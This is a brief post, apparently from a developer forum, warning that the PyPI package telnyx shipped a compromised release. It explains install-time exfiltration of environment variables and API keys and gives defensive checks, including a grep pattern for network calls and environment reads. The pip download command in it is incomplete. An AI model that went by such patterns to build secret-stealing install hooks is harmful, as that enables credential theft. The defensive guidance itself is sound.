Popular PyPI package telnyx was just compromised by TeamPCP. Used by major AI shops. If you run Python deps in CI or prod, this matters. Read the report: https://www.aikido.dev/blog/telnyx-pypi-compromised-teampcp-canisterworm
What they do: push a malicious release. Python packages can run code at import/install time, so a tainted wheel can exfiltrate env vars, API keys, or spawn remote commands. Check for new maintainers, odd file names, and unexpected network calls in the package.
Quick, actionable checks:
pip download telnyx== && unzip '*.whl' -d telnyx && grep -R "requests.post\|socket\|os.environ" telnyx
Run pip-audit, inspect top-level init.py, and compare the wheel contents to previous releases before trusting.
Top comments (0)